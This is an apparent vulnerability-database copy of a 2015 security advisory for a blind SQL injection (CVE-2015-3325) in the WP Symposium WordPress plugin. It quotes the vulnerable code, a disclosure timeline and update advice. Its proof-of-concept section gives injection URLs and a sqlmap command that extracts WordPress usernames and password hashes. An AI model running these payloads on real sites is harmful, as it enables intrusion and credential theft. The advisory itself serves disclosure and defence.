Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection

🗓️ 21 May 2015 00:00:00Reported by Hannes TrundeType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 41 Views

SQL Injection in WordPress WP Symposium Plugin version 15.

Related
Code
ReporterTitlePublishedViews
Family
CNVD		WordPress Plugin WP Symposium 'forum.php' SQL Injection Vulnerability
20 May 201500:00
cnvd
CVE		CVE-2015-3325
15 May 201518:00
cve
Cvelist		CVE-2015-3325
15 May 201518:00
cvelist
Dsquare		Wordpress WP Symposium 15.1 SQL Injection
12 Jan 201600:00
dsquare
EUVD		EUVD-2015-3371
7 Oct 202500:30
euvd
exploitpack		WordPress Plugin WP Symposium 15.1 - show SQL Injection
21 May 201500:00
exploitpack
NVD		CVE-2015-3325
15 May 201518:59
nvd
Packet Storm		WordPress WP Symposium 15.1 SQL Injection
7 May 201500:00
packetstorm
Prion		Sql injection
15 May 201518:59
prion
Tenable Nessus		WP Symposium Plugin for WordPress forum.php 'show' Parameter SQL Injection (Version Check)
18 May 201500:00
nessus
Rows per page
=======================================================================

              title: SQL Injection
            product: WordPress WP Symposium Plugin
 vulnerable version: 15.1 (and probably below)
      fixed version: 15.4
         CVE number: CVE-2015-3325
             impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
           homepage: https://wordpress.org/plugins/wp-symposium/
              found: 2015-02-07
                 by: Hannes Trunde
                     
               mail: [email protected]
            twitter: @hannestrunde

=======================================================================


Plugin description:
-------------------
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress
plugin that provides a forum, activity (similar to Facebook wall), member 
directory, private mail, notification panel, chat windows, profile page, social 
widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook 
Connect and Mobile support! You simply choose which you want to activate! 
Certain features are optional to members to protect their privacy."

Source: https://wordpress.org/plugins/wp-symposium/


Recommendation:
---------------
The author has provided a fixed plugin version which should be installed 
immediately.


Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind sql injection attack can be
performed within the forum feature to obtain sensitive information from the 
database. The vulnerable code sections are described below.

forum.php lines 59-62:
===============================================================================
if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) {
   $cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0;
   $topic_id = isset($_GET['show']) ? $_GET['show'] : 0;  // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE
}
===============================================================================

forum.php lines 95-103:
===============================================================================
if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) {
   if ($topic_id == 0) {
      $forum = __wps__getForum($cat_id);
      if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3);
      $html .= $forum;
   } else {
      $html .= __wps__getTopic($topic_id);	// __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER
   }
}
===============================================================================

functions.php lines 152-155:
===============================================================================
$post = $wpdb->get_row("
   SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info 
   FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID 
   WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id);   //UNVALIDATED $topic_id IS USED IN SQL QUERY
===============================================================================


Proof of concept:
-----------------
The following HTTP request to the forum page returns the topic with id 1:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1
===============================================================================

The following HTTP request to the forum page returns a blank page, thus 
confirming the blind SQL injection vulnerability:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0
===============================================================================

Obtaining users and password hashes with sqlmap may look as follows:
================================================================================
sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users"
================================================================================


Contact timeline:
------------------------
2015-04-08: Contacting author via mail.
2015-04-13: Mail from author, confirming the vulnerability.
2015-04-14: Requesting CVE via post to the open source software security mailing 
            list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-15: Mail from author, stating that updated plugin version will be 
            available in the next few days.
2015-05-05: Mail from author, stating that fixed version has been uploaded and
            should be available soon.
2015-05-07: Confirming that update is available, releasing security advisory
            

Solution:
---------
Update to the most recent plugin version.


Workaround:
-----------
See solution.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 May 2015 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 27.5
EPSS0.019
wordpress pluginwp symposiumsql injectionvulnerabilitycve-2015-3325hannes trundeforumdatabasehttp request
41